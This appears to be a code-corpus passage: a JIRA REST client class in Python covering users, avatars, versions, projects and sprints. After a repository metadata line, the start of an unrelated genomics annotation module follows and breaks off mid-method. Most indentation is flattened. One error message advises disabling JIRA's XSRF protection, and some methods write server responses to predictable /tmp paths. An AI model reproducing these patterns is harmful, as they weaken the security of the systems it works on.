:param startAt: index of the first user to return
:param maxResults: maximum number of users to return
"""
params = {
'username': username,
'startAt': startAt,
'maxResults': maxResults,
}
if project is not None:
params['project'] = project
if issueKey is not None:
params['issueKey'] = issueKey
if expand is not None:
params['expand'] = expand
r_json = self._get_json('user/assignable/search', params)
users = [User(self._options, self._session, raw_user_json)
for raw_user_json in r_json]
return users
# non-resource
def user_avatars(self, username):
"""
Get a dict of avatars for the specified user.
:param username: the username to get avatars for
"""
return self._get_json('user/avatars', params={'username': username})
def create_temp_user_avatar(self, user, filename, size, avatar_img, contentType=None, auto_confirm=False):
"""
Register an image file as a user avatar. The avatar created is temporary and must be confirmed before it can
be used.
Avatar images are specified by a filename, size, and file object. By default, the client will attempt to
autodetect the picture's content type: this mechanism relies on ``libmagic`` and will not work out of the box
on Windows systems (see http://filemagic.readthedocs.org/en/latest/guide.html for details on how to install
support). The ``contentType`` argument can be used to explicitly set the value (note that JIRA will reject any
type other than the well-known ones for images, e.g. ``image/jpg``, ``image/png``, etc.)
This method returns a dict of properties that can be used to crop a subarea of a larger image for use. This
dict should be saved and passed to :py:meth:`confirm_user_avatar` to finish the avatar creation process. If you
want to cut out the middleman and confirm the avatar with JIRA's default cropping, pass the ``auto_confirm``
argument with a truthy value and :py:meth:`confirm_user_avatar` will be called for you before this method
returns.
:param user: user to register the avatar for
:param filename: name of the avatar file
:param size: size of the avatar file
:param avatar_img: file-like object containing the avatar
:param contentType: explicit specification for the avatar image's content-type
:param auto_confirm: whether to automatically confirm the temporary avatar by calling\
:py:meth:`confirm_user_avatar` with the return value of this method.
"""
size_from_file = os.path.getsize(filename)
if size != size_from_file:
size = size_from_file
params = {
'username': user,
'filename': filename,
'size': size
}
headers = {'X-Atlassian-Token': 'no-check'}
if contentType is not None:
headers['content-type'] = contentType
else:
# try to detect content-type, this may return None
headers['content-type'] = self._get_mime_type(avatar_img)
url = self._get_url('user/avatar/temporary')
r = self._session.post(
url, params=params, headers=headers, data=avatar_img)
cropping_properties = json_loads(r)
if auto_confirm:
return self.confirm_user_avatar(user, cropping_properties)
else:
return cropping_properties
def confirm_user_avatar(self, user, cropping_properties):
"""
Confirm the temporary avatar image previously uploaded with the specified cropping.
After a successful registry with :py:meth:`create_temp_user_avatar`, use this method to confirm the avatar for
use. The final avatar can be a subarea of the uploaded image, which is customized with the
``cropping_properties``: the return value of :py:meth:`create_temp_user_avatar` should be used for this
argument.
:param user: the user to confirm the avatar for
:param cropping_properties: a dict of cropping properties from :py:meth:`create_temp_user_avatar`
"""
data = cropping_properties
url = self._get_url('user/avatar')
r = self._session.post(url, params={'username': user},
data=json.dumps(data))
return json_loads(r)
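    # Example of the two-step avatar workflow (hypothetical client and file names):
    #   with open('me.png', 'rb') as img:
    #       props = jira.create_temp_user_avatar('fred', 'me.png', 0, img)
    #   jira.confirm_user_avatar('fred', props)   # or pass auto_confirm=True above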
def set_user_avatar(self, username, avatar):
"""
Set a user's avatar.
:param username: the user to set the avatar for
:param avatar: ID of the avatar to set
"""
self._set_avatar(
{'username': username}, self._get_url('user/avatar'), avatar)
def delete_user_avatar(self, username, avatar):
"""
Delete a user's avatar.
:param username: the user to delete the avatar from
:param avatar: ID of the avatar to remove
"""
params = {'username': username}
url = self._get_url('user/avatar/' + avatar)
r = self._session.delete(url, params=params)
def search_users(self, user, startAt=0, maxResults=50, includeActive=True, includeInactive=False):
"""
Get a list of user Resources that match the specified search string.
:param user: a string to match usernames, name or email against
:param startAt: index of the first user to return
        :param maxResults: maximum number of users to return
        :param includeActive: whether to include active users in the results
        :param includeInactive: whether to include inactive users in the results
"""
params = {
'username': user,
'startAt': startAt,
'maxResults': maxResults,
'includeActive': includeActive,
'includeInactive': includeInactive
}
r_json = self._get_json('user/search', params=params)
users = [User(self._options, self._session, raw_user_json)
for raw_user_json in r_json]
return users
def search_allowed_users_for_issue(self, user, issueKey=None, projectKey=None, startAt=0, maxResults=50):
"""
Get a list of user Resources that match a username string and have browse permission for the issue or
project.
:param user: a string to match usernames against
:param issueKey: find users with browse permission for this issue
:param projectKey: find users with browse permission for this project
:param startAt: index of the first user to return
:param maxResults: maximum number of users to return
"""
params = {
'username': user,
'startAt': startAt,
'maxResults': maxResults,
}
if issueKey is not None:
params['issueKey'] = issueKey
if projectKey is not None:
params['projectKey'] = projectKey
r_json = self._get_json('user/viewissue/search', params)
users = [User(self._options, self._session, raw_user_json)
for raw_user_json in r_json]
return users
# Versions
@translate_resource_args
def create_version(self, name, project, description=None, releaseDate=None, startDate=None, archived=False,
released=False):
"""
Create a version in a project and return a Resource for it.
:param name: name of the version to create
:param project: key of the project to create the version in
:param description: a description of the version
:param releaseDate: the release date assigned to the version
        :param startDate: the start date for the version
        :param archived: whether the version should be created as archived
        :param released: whether the version should be created as released
"""
data = {
'name': name,
'project': project,
'archived': archived,
'released': released
}
if description is not None:
data['description'] = description
if releaseDate is not None:
data['releaseDate'] = releaseDate
if startDate is not None:
data['startDate'] = startDate
url = self._get_url('version')
r = self._session.post(
url, data=json.dumps(data))
version = Version(self._options, self._session, raw=json_loads(r))
return version
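    # e.g. (hypothetical values): jira.create_version('1.2', 'PROJ', releaseDate='2014-06-01')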
def move_version(self, id, after=None, position=None):
"""
Move a version within a project's ordered version list and return a new version Resource for it. One,
but not both, of ``after`` and ``position`` must be specified.
:param id: ID of the version to move
:param after: the self attribute of a version to place the specified version after (that is, higher in the list)
:param position: the absolute position to move this version to: must be one of ``First``, ``Last``,\
``Earlier``, or ``Later``
"""
data = {}
if after is not None:
data['after'] = after
elif position is not None:
data['position'] = position
url = self._get_url('version/' + id + '/move')
r = self._session.post(
url, data=json.dumps(data))
version = Version(self._options, self._session, raw=json_loads(r))
return version
def version(self, id, expand=None):
"""
Get a version Resource.
:param id: ID of the version to get
:param expand: extra information to fetch inside each resource
"""
version = Version(self._options, self._session)
params = {}
if expand is not None:
params['expand'] = expand
version.find(id, params=params)
return version
def version_count_related_issues(self, id):
"""
Get a dict of the counts of issues fixed and affected by a version.
:param id: the version to count issues for
"""
r_json = self._get_json('version/' + id + '/relatedIssueCounts')
del r_json['self'] # this isn't really an addressable resource
return r_json
def version_count_unresolved_issues(self, id):
"""
Get the number of unresolved issues for a version.
:param id: ID of the version to count issues for
"""
return self._get_json('version/' + id + '/unresolvedIssueCount')['issuesUnresolvedCount']
# Session authentication
def session(self):
"""Get a dict of the current authenticated user's session information."""
url = '{server}/rest/auth/1/session'.format(**self._options)
if type(self._session.auth) is tuple:
authentication_data = {
'username': self._session.auth[0], 'password': self._session.auth[1]}
r = self._session.post(url, data=json.dumps(authentication_data))
else:
r = self._session.get(url)
user = User(self._options, self._session, json_loads(r))
return user
def kill_session(self):
"""Destroy the session of the current authenticated user."""
url = self._options['server'] + '/rest/auth/latest/session'
r = self._session.delete(url)
# Websudo
def kill_websudo(self):
"""Destroy the user's current WebSudo session."""
url = self._options['server'] + '/rest/auth/1/websudo'
r = self._session.delete(url)
# Utilities
def _create_http_basic_session(self, username, password):
verify = self._options['verify']
self._session = ResilientSession()
self._session.verify = verify
self._session.auth = (username, password)
self._session.cert = self._options['client_cert']
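    # _create_oauth_session expects a dict with 'consumer_key', 'key_cert' (the RSA
    # private key contents), 'access_token' and 'access_token_secret'.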
def _create_oauth_session(self, oauth):
verify = self._options['verify']
from requests_oauthlib import OAuth1
from oauthlib.oauth1 import SIGNATURE_RSA
oauth = OAuth1(
oauth['consumer_key'],
rsa_key=oauth['key_cert'],
signature_method=SIGNATURE_RSA,
resource_owner_key=oauth['access_token'],
resource_owner_secret=oauth['access_token_secret']
)
self._session = ResilientSession()
self._session.verify = verify
self._session.auth = oauth
def _set_avatar(self, params, url, avatar):
data = {
'id': avatar
}
r = self._session.put(url, params=params, data=json.dumps(data))
def _get_url(self, path, base=JIRA_BASE_URL):
options = self._options
options.update({'path': path})
return base.format(**options)
def _get_json(self, path, params=None, base=JIRA_BASE_URL):
url = self._get_url(path, base)
r = self._session.get(url, params=params)
try:
r_json = json_loads(r)
except ValueError as e:
logging.error("%s\n%s" % (e, r.text))
raise e
return r_json
def _find_for_resource(self, resource_cls, ids, expand=None):
resource = resource_cls(self._options, self._session)
params = {}
if expand is not None:
params['expand'] = expand
resource.find(id=ids, params=params)
return resource
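    # Avatar content-type detection: prefer libmagic when it is importable, otherwise
    # fall back to imghdr + mimetypes in _get_mime_type() below.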
def _try_magic(self):
try:
import magic
import weakref
except ImportError:
self._magic = None
else:
try:
_magic = magic.Magic(flags=magic.MAGIC_MIME_TYPE)
cleanup = lambda _: _magic.close()
self._magic_weakref = weakref.ref(self, cleanup)
self._magic = _magic
except TypeError:
self._magic = None
except AttributeError:
self._magic = None
def _get_mime_type(self, buff):
if self._magic is not None:
return self._magic.id_buffer(buff)
else:
try:
return mimetypes.guess_type("f." + imghdr.what(0, buff))[0]
except (IOError, TypeError):
logging.warning("Couldn't detect content type of avatar image"
". Specify the 'contentType' parameter explicitly.")
return None
def email_user(self, user, body, title="JIRA Notification"):
"""
TBD:
"""
url = self._options['server'] + \
'/secure/admin/groovy/CannedScriptRunner.jspa'
payload = {
'cannedScript': 'com.onresolve.jira.groovy.canned.workflow.postfunctions.SendCustomEmail',
'cannedScriptArgs_FIELD_CONDITION': '',
'cannedScriptArgs_FIELD_EMAIL_TEMPLATE': body,
'cannedScriptArgs_FIELD_EMAIL_SUBJECT_TEMPLATE': title,
'cannedScriptArgs_FIELD_EMAIL_FORMAT': 'TEXT',
'cannedScriptArgs_FIELD_TO_ADDRESSES': self.user(user).emailAddress,
'cannedScriptArgs_FIELD_TO_USER_FIELDS': '',
'cannedScriptArgs_FIELD_INCLUDE_ATTACHMENTS': 'FIELD_INCLUDE_ATTACHMENTS_NONE',
'cannedScriptArgs_FIELD_FROM': '',
'cannedScriptArgs_FIELD_PREVIEW_ISSUE': '',
'cannedScript': 'com.onresolve.jira.groovy.canned.workflow.postfunctions.SendCustomEmail',
'id': '',
'Preview': 'Preview',
}
r = self._session.post(
url, headers=self._options['headers'], data=payload)
open("/tmp/jira_email_user_%s.html" % user, "w").write(r.text)
def rename_user(self, old_user, new_user):
"""
        Rename a JIRA user. The current implementation relies on a third-party plugin, but in the future it may use embedded JIRA functionality.
:param old_user: string with username login
:param new_user: string with username login
"""
if self._version >= (6, 0, 0):
url = self._options['server'] + '/rest/api/2/user'
payload = {
"name": new_user,
}
params = {
'username': old_user
}
# raw displayName
logging.debug("renaming %s" % self.user(old_user).emailAddress)
r = self._session.put(url, params=params,
data=json.dumps(payload))
else:
            # the old implementation needed the ScriptRunner plugin
merge = "true"
try:
self.user(new_user)
except:
merge = "false"
url = self._options[
'server'] + '/secure/admin/groovy/CannedScriptRunner.jspa#result'
payload = {
"cannedScript": "com.onresolve.jira.groovy.canned.admin.RenameUser",
"cannedScriptArgs_FIELD_FROM_USER_ID": old_user,
"cannedScriptArgs_FIELD_TO_USER_ID": new_user,
"cannedScriptArgs_FIELD_MERGE": merge,
"id": "",
"RunCanned": "Run",
}
# raw displayName
logging.debug("renaming %s" % self.user(old_user).emailAddress)
r = self._session.post(
url, headers=self._options['headers'], data=payload)
if r.status_code == 404:
logging.error(
"In order to be able to use rename_user() you need to install Script Runner plugin. See https://marketplace.atlassian.com/plugins/com.onresolve.jira.groovy.groovyrunner")
return False
if r.status_code != 200:
logging.error(r.status_code)
if re.compile("XSRF Security Token Missing").search(r.content):
logging.fatal(
"Reconfigure JIRA and disable XSRF in order to be able call this. See https://developer.atlassian.com/display/JIRADEV/Form+Token+Handling")
return False
open("/tmp/jira_rename_user_%s_to%s.html" %
(old_user, new_user), "w").write(r.content)
msg = r.status_code
m = re.search("<span class=\"errMsg\">(.*)<\/span>", r.content)
if m:
msg = m.group(1)
logging.error(msg)
return False
# <span class="errMsg">Target user ID must exist already for a merge</span>
p = re.compile("type=\"hidden\" name=\"cannedScriptArgs_Hidden_output\" value=\"(.*?)\"\/>",
re.MULTILINE | re.DOTALL)
m = p.search(r.content)
if m:
h = html_parser.HTMLParser()
msg = h.unescape(m.group(1))
logging.info(msg)
# let's check if the user still exists
try:
self.user(old_user)
except:
logging.error("User %s does not exists." % old_user)
return msg
logging.error(msg)
logging.error(
"User %s does still exists after rename, that's clearly a problem." % old_user)
return False
def delete_user(self, username):
url = self._options['server'] + \
'/rest/api/latest/user/?username=%s' % username
r = self._session.delete(url)
if 200 <= r.status_code <= 299:
return True
else:
logging.error(r.status_code)
return False
def reindex(self, force=False, background=True):
"""
        Start JIRA re-indexing. Returns True if reindexing is in progress or not needed, or False.
        If you call reindex() without any parameters it will perform a background reindex only if JIRA thinks it should do it.
        :param force: reindex even if JIRA doesn't say this is needed, False by default.
        :param background: reindex in the background, slower but does not impact the users, defaults to True.
"""
# /secure/admin/IndexAdmin.jspa
# /secure/admin/jira/IndexProgress.jspa?taskId=1
if background:
indexingStrategy = 'background'
else:
indexingStrategy = 'stoptheworld'
url = self._options['server'] + '/secure/admin/jira/IndexReIndex.jspa'
r = self._session.get(url, headers=self._options['headers'])
if r.status_code == 503:
# logging.warning("JIRA returned 503, this could mean that a full reindex is in progress.")
return 503
if not r.text.find("To perform the re-index now, please go to the") and force is False:
return True
if r.text.find('All issues are being re-indexed'):
logging.warning("JIRA re-indexing is already running.")
return True # still reindexing is considered still a success
if r.text.find('To perform the re-index now, please go to the') or force:
r = self._session.post(url, headers=self._options['headers'],
params={"indexingStrategy": indexingStrategy, "reindex": "Re-Index"})
if r.text.find('All issues are being re-indexed') != -1:
return True
else:
logging.error("Failed to reindex jira, probably a bug.")
return False
def backup(self, filename='backup.zip'):
"""
        Trigger a JIRA export to back up as zipped XML. Returning with success does not mean that the backup process has finished.
"""
url = self._options['server'] + '/secure/admin/XmlBackup.jspa'
payload = {'filename': filename}
r = self._session.post(
url, headers=self._options['headers'], data=payload)
if r.status_code == 200:
return True
else:
logging.warning(
'Got %s response from calling backup.' % r.status_code)
return r.status_code
def current_user(self):
if not hasattr(self, '_serverInfo') or 'username' not in self._serverInfo:
url = self._get_url('serverInfo')
r = self._session.get(url, headers=self._options['headers'])
r_json = json_loads(r)
if 'x-ausername' in r.headers:
r_json['username'] = r.headers['x-ausername']
else:
r_json['username'] = None
self._serverInfo = r_json
# del r_json['self'] # this isn't really an addressable resource
return self._serverInfo['username']
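    # The username is cached on self._serverInfo, so repeated calls to current_user()
    # only hit the server once.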
def delete_project(self, pid):
"""
Project can be id, project key or project name. It will return False if it fails.
"""
found = False
try:
            # a numeric pid (project id) can be used directly
            int(pid)
            found = True
except Exception as e:
r_json = self._get_json('project')
for e in r_json:
if e['key'] == pid or e['name'] == pid:
pid = e['id']
found = True
break
if not found:
logging.error("Unable to recognize project `%s`" % pid)
return False
url = self._options['server'] + '/secure/admin/DeleteProject.jspa'
payload = {'pid': pid, 'Delete': 'Delete', 'confirm': 'true'}
r = self._session.post(
url, headers=CaseInsensitiveDict({'content-type': 'application/x-www-form-urlencoded'}), data=payload)
if r.status_code == 200:
return self._check_for_html_error(r.text)
else:
logging.warning(
'Got %s response from calling delete_project.' % r.status_code)
return r.status_code
def create_project(self, key, name=None, assignee=None):
"""
Key is mandatory and has to match JIRA project key requirements, usually only 2-10 uppercase characters.
If name is not specified it will use the key value.
If assignee is not specified it will use current user.
The returned value should evaluate to False if it fails otherwise it will be the new project id.
"""
if assignee is None:
assignee = self.current_user()
if name is None:
name = key
if key.upper() != key or not key.isalpha() or len(key) < 2 or len(key) > 10:
logging.error(
                'key parameter is not all-uppercase alphabetic with length between 2 and 10')
return False
url = self._options['server'] + \
'/rest/project-templates/1.0/templates'
r = self._session.get(url)
j = json_loads(r)
template_key = None
templates = []
for template in j['projectTemplates']:
templates.append(template['name'])
if template['name'] in ['JIRA Classic', 'JIRA Default Schemes']:
template_key = template['projectTemplateModuleCompleteKey']
break
if not template_key:
raise JIRAError(
"Unable to find a suitable project template to use. Found only: " + ', '.join(templates))
payload = {'name': name,
'key': key,
'keyEdited': 'false',
#'projectTemplate': 'com.atlassian.jira-core-project-templates:jira-issuetracking',
#'permissionScheme': '',
'projectTemplateWebItemKey': template_key,
'projectTemplateModuleKey': template_key,
'lead': assignee,
#'assigneeType': '2',
}
headers = CaseInsensitiveDict(
{'Content-Type': 'application/x-www-form-urlencoded'})
r = self._session.post(url, data=payload, headers=headers)
if r.status_code == 200:
r_json = json_loads(r)
return r_json
f = tempfile.NamedTemporaryFile(
suffix='.html', prefix='python-jira-error-create-project-', delete=False)
f.write(r.text)
if self.logging:
logging.error(
"Unexpected result while running create project. Server response saved in %s for further investigation [HTTP response=%s]." % (
f.name, r.status_code))
return False
def add_user(self, username, email, directoryId=1, password=None, fullname=None, sendEmail=False, active=True):
        if fullname is None:
            fullname = username
# TODO: default the directoryID to the first directory in jira instead
# of 1 which is the internal one.
url = self._options['server'] + '/rest/api/latest/user'
# implementation based on
# https://docs.atlassian.com/jira/REST/ondemand/#d2e5173
x = OrderedDict()
x['displayName'] = fullname
x['emailAddress'] = email
x['name'] = username
if password:
x['password'] = password
payload = json.dumps(x)
self._session.post(url, data=payload)
return True
def add_user_to_group(self, username, group):
'''
Adds a user to an existing group.
:param username: Username that will be added to specified group.
:param group: Group that the user will be added to.
:return: Boolean, True for success, false for failure.
'''
url = self._options['server'] + '/rest/api/latest/group/user'
x = {'groupname': group}
y = {'name': username}
payload = json.dumps(y)
self._session.post(url, params=x, data=payload)
return True
def remove_user_from_group(self, username, groupname):
'''
Removes a user from a group.
:param username: The user to remove from the group.
:param groupname: The group that the user will be removed from.
:return:
'''
url = self._options['server'] + '/rest/api/latest/group/user'
x = {'groupname': groupname,
'username': username}
self._session.delete(url, params=x)
return True
# Experimental
# Experimental support for iDalko Grid, expect API to change as it's using private APIs currently
# https://support.idalko.com/browse/IGRID-1017
def get_igrid(self, issueid, customfield, schemeid):
url = self._options['server'] + '/rest/idalko-igrid/1.0/datagrid/data'
if str(customfield).isdigit():
customfield = "customfield_%s" % customfield
params = {
#'_mode':'view',
'_issueId': issueid,
'_fieldId': customfield,
'_confSchemeId': schemeid,
#'validate':True,
#'_search':False,
#'rows':100,
#'page':1,
#'sidx':'DEFAULT',
#'sord':'asc',
}
r = self._session.get(
url, headers=self._options['headers'], params=params)
return json_loads(r)
# Jira Agile specific methods (GreenHopper)
"""
Define the functions that interact with GreenHopper.
"""
@translate_resource_args
def boards(self):
"""
Get a list of board GreenHopperResources.
"""
r_json = self._get_json(
'rapidviews/list', base=self.AGILE_BASE_URL)
boards = [Board(self._options, self._session, raw_boards_json)
for raw_boards_json in r_json['views']]
return boards
@translate_resource_args
def sprints(self, id, extended=False):
"""
Get a list of sprint GreenHopperResources.
:param id: the board to get sprints from
:param extended: fetch additional information like startDate, endDate, completeDate,
much slower because it requires an additional requests for each sprint
:rtype: dict
>>> { "id": 893,
>>> "name": "iteration.5",
>>> "state": "FUTURE",
>>> "linkedPagesCount": 0,
>>> "startDate": "None",
>>> "endDate": "None",
>>> "completeDate": "None",
>>> "remoteLinks": []
>>> }
"""
r_json = self._get_json('sprintquery/%s?includeHistoricSprints=true&includeFutureSprints=true' % id,
base=self.AGILE_BASE_URL)
if extended:
sprints = []
for raw_sprints_json in r_json['sprints']:
r_json = self._get_json(
'sprint/%s/edit/model' % raw_sprints_json['id'], base=self.AGILE_BASE_URL)
sprints.append(
Sprint(self._options, self._session, r_json['sprint']))
else:
sprints = [Sprint(self._options, self._session, raw_sprints_json)
for raw_sprints_json in r_json['sprints']]
return sprints
def sprints_by_name(self, id, extended=False):
sprints = {}
for s in self.sprints(id, extended=extended):
if s.name not in sprints:
sprints[s.name] = s.raw
else:
raise (Exception(
"Fatal error, duplicate Sprint Name (%s) found on board %s." % (s.name, id)))
return sprints
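    # Example (hypothetical board id): sprints_by_name(84) returns something like
    #   {'iteration.5': {'id': 893, 'name': 'iteration.5', 'state': 'FUTURE', ...}, ...}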
def update_sprint(self, id, name=None, startDate=None, endDate=None):
payload = {}
if name:
payload['name'] = name
if startDate:
payload['startDate'] = startDate
if endDate:
            payload['endDate'] = endDate
# if state:
# payload['state']=state
url = self._get_url('sprint/%s' % id, base=self.AGILE_BASE_URL)
r = self._session.put(
url, data=json.dumps(payload))
return json_loads(r)
def completed_issues(self, board_id, sprint_id):
"""
Return the completed issues for ``board_id`` and ``sprint_id``.
        :param board_id: the board to retrieve issues from
        :param sprint_id: the sprint to retrieve issues from
"""
# TODO need a better way to provide all the info from the sprintreport
        # incompletedIssues went to the backlog but were not completed
# issueKeysAddedDuringSprint used to mark some with a * ?
# puntedIssues are for scope change?
r_json = self._get_json('rapid/charts/sprintreport?rapidViewId=%s&sprintId=%s' % (board_id, sprint_id),
base=self.AGILE_BASE_URL)
issues = [Issue(self._options, self._session, raw_issues_json) for raw_issues_json in
r_json['contents']['completedIssues']]
return issues
def completedIssuesEstimateSum(self, board_id, sprint_id):
"""
Return the total completed points this sprint.
"""
return self._get_json('rapid/charts/sprintreport?rapidViewId=%s&sprintId=%s' % (board_id, sprint_id),
base=self.AGILE_BASE_URL)['contents']['completedIssuesEstimateSum']['value']
def incompleted_issues(self, board_id, sprint_id):
"""
        Return the incomplete issues for the sprint.
"""
r_json = self._get_json('rapid/charts/sprintreport?rapidViewId=%s&sprintId=%s' % (board_id, sprint_id),
base=self.AGILE_BASE_URL)
issues = [Issue(self._options, self._session, raw_issues_json) for raw_issues_json in
r_json['contents']['incompletedIssues']]
return issues
def sprint_info(self, board_id, sprint_id):
"""
Return the information about a sprint.
        :param board_id: the board the sprint belongs to
        :param sprint_id: the sprint to get information about
"""
return self._get_json('rapid/charts/sprintreport?rapidViewId=%s&sprintId=%s' % (board_id, sprint_id),
base=self.AGILE_BASE_URL)['sprint']
# TODO: remove this as we do have Board.delete()
def delete_board(self, id):
"""
Deletes an agile board.
:param id:
:return:
"""
payload = {}
url = self._get_url(
'rapidview/%s' % id, base=self.AGILE_BASE_URL)
r = self._session.delete(
url, data=json.dumps(payload))
def create_board(self, name, project_ids, preset="scrum"):
"""
Create a new board for the ``project_ids``.
:param name: name of the board
:param project_ids: the projects to create the board in
:param preset: what preset to use for this board
:type preset: 'kanban', 'scrum', 'diy'
"""
payload = {}
if isinstance(project_ids, string_types):
ids = []
for p in project_ids.split(','):
ids.append(self.project(p).id)
project_ids = ','.join(ids)
payload['name'] = name
if isinstance(project_ids, string_types):
project_ids = project_ids.split(',')
payload['projectIds'] = project_ids
payload['preset'] = preset
url = self._get_url(
'rapidview/create/presets', base=self.AGILE_BASE_URL)
r = self._session.post(
url, data=json.dumps(payload))
raw_issue_json = json_loads(r)
return Board(self._options, self._session, raw=raw_issue_json)
def create_sprint(self, name, board_id, startDate=None, endDate=None):
"""
Create a new sprint for the ``board_id``.
:param name: name of the sprint
:param board_id: the board to add the sprint to
"""
url = self._get_url(
'sprint/%s' % board_id, base=self.AGILE_BASE_URL)
r = self._session.post(
url)
raw_issue_json = json_loads(r)
""" now r contains something like:
{
"id": 742,
"name": "Sprint 89",
"state": "FUTURE",
"linkedPagesCount": 0,
"startDate": "None",
"endDate": "None",
"completeDate": "None",
"remoteLinks": []
}"""
payload = {'name': name}
if startDate:
payload["startDate"] = startDate
if endDate:
payload["endDate"] = endDate
url = self._get_url(
'sprint/%s' % raw_issue_json['id'], base=self.AGILE_BASE_URL)
r = self._session.put(
url, data=json.dumps(payload))
raw_issue_json = json_loads(r)
return Sprint(self._options, self._session, raw=raw_issue_json)
    # TODO: broken, this API does not exist anymore and we need to use
    # issue.update() to perform this operation
def add_issues_to_sprint(self, sprint_id, issue_keys):
"""
Add the issues in ``issue_keys`` to the ``sprint_id``. The sprint must
be started but not completed.
If a sprint was completed, then have to also edit the history of the
issue so that it was added to the sprint before it was completed,
preferably before it started. A completed sprint's issues also all have
a resolution set before the completion date.
If a sprint was not started, then have to edit the marker and copy the
rank of each issue too.
:param sprint_id: the sprint to add issues to
:param issue_keys: the issues to add to the sprint
"""
data = {}
data['issueKeys'] = issue_keys
url = self._get_url('sprint/%s/issues/add' %
(sprint_id), base=self.AGILE_BASE_URL)
r = self._session.put(url, data=json.dumps(data))
def add_issues_to_epic(self, epic_id, issue_keys, ignore_epics=True):
"""
Add the issues in ``issue_keys`` to the ``epic_id``.
:param epic_id: the epic to add issues to
:param issue_keys: the issues to add to the epic
:param ignore_epics: ignore any issues listed in ``issue_keys`` that are epics
"""
data = {}
data['issueKeys'] = issue_keys
data['ignoreEpics'] = ignore_epics
url = self._get_url('epics/%s/add' %
epic_id, base=self.AGILE_BASE_URL)
r = self._session.put(
url, data=json.dumps(data))
def rank(self, issue, next_issue):
"""
Rank an issue before another using the default Ranking field, the one named 'Rank'.
:param issue: issue key of the issue to be ranked before the second one.
:param next_issue: issue key of the second issue.
"""
# {"issueKeys":["ANERDS-102"],"rankBeforeKey":"ANERDS-94","rankAfterKey":"ANERDS-7","customFieldId":11431}
if not self._rank:
for field in self.fields():
if field['name'] == 'Rank' and field['schema']['custom'] == "com.pyxis.greenhopper.jira:gh-global-rank":
self._rank = field['schema']['customId']
data = {
"issueKeys": [issue], "rankBeforeKey": next_issue, "customFieldId": self._rank}
url = self._get_url('rank', base=self.AGILE_BASE_URL)
r = self._session.put(
url, data=json.dumps(data))
class GreenHopper(JIRA):
def __init__(self, options=None, basic_auth=None, oauth=None, async=None):
warnings.warn(
"GreenHopper() class is deprecated, just use JIRA() instead.", DeprecationWarning)
self._rank = None
JIRA.__init__(
self, options=options, basic_auth=basic_auth, oauth=oauth, async=async)
| bsd-2-clause | 4,014,760,144,798,227,500 | 38.09324 | 203 | 0.59418 | false |
poojavade/Genomics_Docker | Dockerfiles/gedlab-khmer-filter-abund/pymodules/python2.7/lib/python/gemini-0.10.0-py2.7.egg/gemini/annotations.py | 1 | 30633 | #!/usr/bin/env python
import pysam
import sqlite3
import os
import sys
import collections
import re
from unidecode import unidecode
from bx.bbi.bigwig_file import BigWigFile
from gemini.config import read_gemini_config
# dictionary of anno_type -> open Tabix file handles
annos = {}
def get_anno_files( args ):
config = read_gemini_config( args = args )
anno_dirname = config["annotation_dir"]
# Default annotations -- always found
annos = {
'pfam_domain': os.path.join(anno_dirname, 'hg19.pfam.ucscgenes.bed.gz'),
'cytoband': os.path.join(anno_dirname, 'hg19.cytoband.bed.gz'),
'dbsnp': os.path.join(anno_dirname, 'dbsnp.138.vcf.gz'),
'clinvar': os.path.join(anno_dirname, 'clinvar_20140303.vcf.gz'),
'gwas': os.path.join(anno_dirname, 'hg19.gwas.bed.gz'),
'rmsk': os.path.join(anno_dirname, 'hg19.rmsk.bed.gz'),
'segdup': os.path.join(anno_dirname, 'hg19.segdup.bed.gz'),
'conserved': os.path.join(anno_dirname, '29way_pi_lods_elements_12mers.chr_specific.fdr_0.1_with_scores.txt.hg19.merged.bed.gz'),
'cpg_island': os.path.join(anno_dirname, 'hg19.CpG.bed.gz'),
'dgv': os.path.join(anno_dirname, 'hg19.dgv.bed.gz'),
'esp': os.path.join(anno_dirname,
'ESP6500SI.all.snps_indels.vcf.gz'),
'1000g': os.path.join(anno_dirname,
'ALL.wgs.integrated_phase1_v3.20101123.snps_indels_sv.sites.2012Oct12.vcf.gz'),
'recomb': os.path.join(anno_dirname,
'genetic_map_HapMapII_GRCh37.gz'),
'gms': os.path.join(anno_dirname,
'GRCh37-gms-mappability.vcf.gz'),
'grc': os.path.join(anno_dirname, 'GRC_patch_regions.bed.gz'),
'cse': os.path.join(anno_dirname, "cse-hiseq-8_4-2013-02-20.bed.gz"),
'encode_tfbs': os.path.join(anno_dirname,
'wgEncodeRegTfbsClusteredV2.cell_count.20130213.bed.gz'),
'encode_dnase1': os.path.join(anno_dirname,
'stam.125cells.dnaseI.hg19.bed.gz'),
'encode_consensus_segs': os.path.join(anno_dirname,
'encode.6celltypes.consensus.bedg.gz'),
'gerp_elements': os.path.join(anno_dirname, 'hg19.gerp.elements.bed.gz'),
'vista_enhancers': os.path.join(anno_dirname, 'hg19.vista.enhancers.20131108.bed.gz'),
'cosmic': os.path.join(anno_dirname, 'hg19.cosmic.v67.20131024.gz')
}
# optional annotations
if os.path.exists(os.path.join(anno_dirname, 'hg19.gerp.bw')):
annos['gerp_bp'] = os.path.join(anno_dirname, 'hg19.gerp.bw')
if os.path.exists(os.path.join(anno_dirname, 'whole_genome_SNVs.tsv.compressed.gz')):
annos['cadd_score'] = os.path.join(anno_dirname, 'whole_genome_SNVs.tsv.compressed.gz')
return annos
class ClinVarInfo(object):
def __init__(self):
self.clinvar_dbsource = None
self.clinvar_dbsource_id = None
self.clinvar_origin = None
self.clinvar_sig = None
self.clinvar_dsdb = None
self.clinvar_dsdbid = None
self.clinvar_disease_name = None
self.clinvar_disease_acc = None
self.clinvar_in_omim = None
self.clinvar_in_locus_spec_db = None
self.clinvar_on_diag_assay = None
self.origin_code_map = {'0': 'unknown',
'1': 'germline',
'2': 'somatic',
'4': 'inherited',
'8': 'paternal',
'16': 'maternal',
'32': 'de-novo',
'64': 'biparental',
'128': 'uniparental',
'256': 'not-tested',
'512': 'tested-inconclusive',
'1073741824': 'other'}
self.sig_code_map = {'0': 'unknown',
'1': 'untested',
'2': 'non-pathogenic',
'3': 'probable-non-pathogenic',
'4': 'probable-pathogenic',
'5': 'pathogenic',
'6': 'drug-response',
'7': 'histocompatibility',
'255': 'other'}
def __repr__(self):
return '\t'.join([self.clinvar_dbsource,
self.clinvar_dbsource_id,
self.clinvar_origin,
self.clinvar_sig,
self.clinvar_dsdb,
self.clinvar_dsdbid,
self.clinvar_disease_name,
self.clinvar_disease_acc,
str(self.clinvar_in_omim),
str(self.clinvar_in_locus_spec_db),
str(self.clinvar_on_diag_assay)])
def lookup_clinvar_origin(self, origin_code):
try:
return self.origin_code_map[origin_code]
except KeyError:
return None
def lookup_clinvar_significance(self, sig_code):
